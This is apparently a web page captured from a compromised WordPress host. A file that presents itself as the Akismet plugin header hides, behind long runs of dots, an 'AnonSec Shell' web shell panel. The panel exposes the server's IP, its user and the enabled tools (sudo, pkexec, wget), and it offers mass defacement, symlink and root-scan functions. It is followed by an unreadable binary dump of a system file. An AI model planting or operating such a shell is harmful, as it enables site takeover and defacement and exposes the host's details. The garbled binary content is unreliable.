#/** * @package Akismet */ /* Plugin Name: Akismet Anti-spam: Spam Protection Plugin URI: https://akismet.com/ Description: Used by millions, Akismet is quite possibly the best way in the world to protect your blog from spam. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key. Version: 5.4 Requires at least: 5.8 Requires PHP: 7.2 Author: Automattic - Anti-spam Team Author URI: https://automattic.com/wordpress-plugins/ License: GPLv2 or later Text Domain: akismet */ /* This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. Copyright 2005-2025 Automattic, Inc. */ // Make sure we don't expose any info if called directly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 62.109.13.187  /  Your IP : 216.73.216.11   [ Reverse IP ]
Web Server : Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips PHP/8.2.28
System : Linux robothost.ru 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : mosrembit ( 6064)
PHP Version : 8.2.28
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/bin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /usr/bin/paperconf
ELF>�@@�%@8	@@@@@@��88@8@@@�� ``�@ ``��TT@T@DDP�td@@DDQ�tdR�td``/lib64/ld-linux-x86-64.so.2GNU GNU��`��υ�R}h�?����L��!\ #(�BE���|�qX���9�2�������Rt1K.�Y���0t _��~i���6>f)!`�� `�@!`�� `8�@K0!`� !`(�@D(!`libpaper.so.1__gmon_start__paperdone_finipapernext_initpaperpswidthpaperpsheightsystempapernamepaperfirstpaperinfopaperinitdefaultpapernamesystempapersizefilelibc.so.6__printf_chkexit_IO_putcsetlocaleoptindstrrchrperror__stack_chk_fail__errno_locationgetopt__fprintf_chkstdoutfputs__ctype_b_locoptargstderr__ctype_toupper_loc__sprintf_chk__libc_start_main_edata__bss_start_endGLIBC_2.3.4GLIBC_2.4GLIBC_2.2.5GLIBC_2.3�ti	�ii
�ui	�ii
��`!` !`#(!`%0!`" `  `( `0 `8 `@ `H `P `X `	` `
h `p `x `
� `� `� `� `� `� `� `� `� `� `� `� `� `� `� `H��H�� H��t�H����5� �%� @�%� h����%� h�����%� h����%� h����%� h����%� h����%� h����%� h�p����%� h�`����%� h	�P����%� h
�@����%� h�0����%� h� ����%� h
�����%� h�����%z h���%r h����%j h�����%b h����%Z h����%R h����%J h����%B h����%: h�p����%2 h�`����%* h�P����%" h�@����% h�0���AWAVAUATA���UH����@SH��X dH�%(H��$H 1�����L�}�/L�����H�PH��LE�1�E1�E1���@H��D���0����������N��,���$ň@@�ˀ���������E����M����L�-� E1��f.��������f���p���� �o������pus��@�[������P���E��u[M��uV�a���E1�I���6���fD��pu;���#���E��u+M��u&E1�A��������u����L���Hc� A�T$�9��M����A9�u�����E��f�uUL�����H������H���3�>���1�H��$H dH3%(��H��X []A\A]A^A_��n���E��tF�t���H��H��t�H�����H���z���H��H��u��A9�t�L�l��1���E��u�M���e����k���H��I���Q����*���H��I���@����y���M��I���`@�@ �H��1��j��������8tVH������c�����	�����H�=� 1�M��L����@������tL������$��������H�5c H������1�I��^H��H���PTI��@H�0@H���
@���f.�D�!`UH-!`H��H��w]øH��t�]�!`����!`UH-!`H��H��H��H��?H�H�u]úH��t�]H�ƿ!`����=� uUH���~���]�� ��@H�=h t�H��tU�`H���]�{����s���AUATA��UH��S��H��A�����t-@����@���@����A��A���DfDE1�H�������@H�¿1���E����H�5� � �J�����H���n�� ����@���G����^o��@�����E��tHH�5_ � �����H���I�� ����@�������@���N���H�5 H���
[]A\A]������H��L� ����H�H��A�DDtQ���I����H��L�(����H�I�L$��@�A��A��A�T�1�A��A��������������A��H�¾�@�1�A�����A��A�����@����^C��@���o�������f.�����^��@���Y�7������f��[����^���@���Y��������f������@������G���f��k����^���@���Y��Y|�������f.������^S��@���YL�Y<�o���������������
���@����������A��A��A��A���(����H��H��H�=" �@�1������g����AWA��AVI��AUI��ATL�%� UH�-� SL)�1�H��H�����H��t�L��L��D��A��H��H9�u�H��[]A\A]A^A_Ðf.���H��H���%c%s%g cm%g mm%g"%gadznNswhcmip:%s: unknown paper `%s'
usage: %s [ [ -p ] papername | -d | -a ] [ -z ] [ -n | -N ] [ -s | -w | -h ] [ -c | -m | -i ]
%s: cannot get paper size from %s@@P@P@P@P@P@P@P@P@P@P@P@P@P@P@P@P@P@P@ @P@@�@P@P@P@�@�@P@P@P@�@�@P@�@P@P@�@P@P@P@x@P@P@p@R@R���Q@$@;D�������`���������(���`�����zRx�g���*zRx�$p��FJw�?;*3$"<D���(B�B�D �D(�F0
(F ABBH�����)DL���B�B�B �B(�I0�I8�G�A�
8A0A(B BBBAD�����eB�E�E �E(�H0�H8�M@l8A0A(B BBB4���@�@��@
�@``���o�@p@�@
� `�P	@�@x	���o�@���o�o:@`&@6@F@V@f@v@�@�@�@�@�@�@�@�@
@
@&
@6
@F
@V
@f
@v
@�
@�
@�
@�
@�
@�
@paperconf.debug[]u��7zXZ�ִF!t/���C]?�E�h=��ڊ̓�N��FC"�)u��L)���,���D� �×݁��99��6ʏ�HD>��f���V�_I��2���=��sT����V�#�t#gj���E�/-���[ߧ��1��f�w5��
yNL���<ܦ<I�
��}-MX�̧��{��~7p�u|����U�Y�ƪ�>+��hm10���G�>y�{�I�/�ݕ�%��la�
�+pI�rXo4E[���U��z�%�䃾s��=g_��[�>�X�Tl+�b�ڙ��[� ��,��RSv������IS:n�'J��L^Ne�p]a�������qs8c+
0�V����\7����
��L�� L�6�y�c|�%���C�q
Ko���.����A~|Z˂���P�u%�S�������߆�<��"��b�	�q%�
^ٷ}�'Ҩ��wd����$�Q"�&�1��c[�� �
m&ؠ|���RD<�M��Ĕ7�a�7(�=�=�/�@�$O���>�	#s�)�X��NO��欣�~�<���X��g8ee�i�Oi��1b\"Sf�<(��������n!-�����g�8�����ы6Z�&�p�6ȻF��6<�\(�@���ܼ��g|��\�xU�C�x{�+b�C��o��I��l0L�”��gX!�@^�Zv=̒2W���E�'
��w���jX8�+��[(���ϱ�U�B٤߸[��;��.�\a��E��#�:L��;
���di7��
n��
Q��pK�LV�ޗ�Т�\�%��jJ��N��-�G�Zb����n���bZ���V>�2�wL������m��g�YZ.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.got.plt.data.bss.gnu_debuglink.gnu_debugdata8@8T@T !t@t$4���o�@�H>�@��Fp@p�N���o:@:L[���o�@�Pj�@�xtBP	@P	�~�@�y@���
@�
���@�	��@�X�@D�P@P|�`�`�`�`���`�� ` ��� `� �!`� @ �� �!��$


Anon7 - 2022
AnonSec Team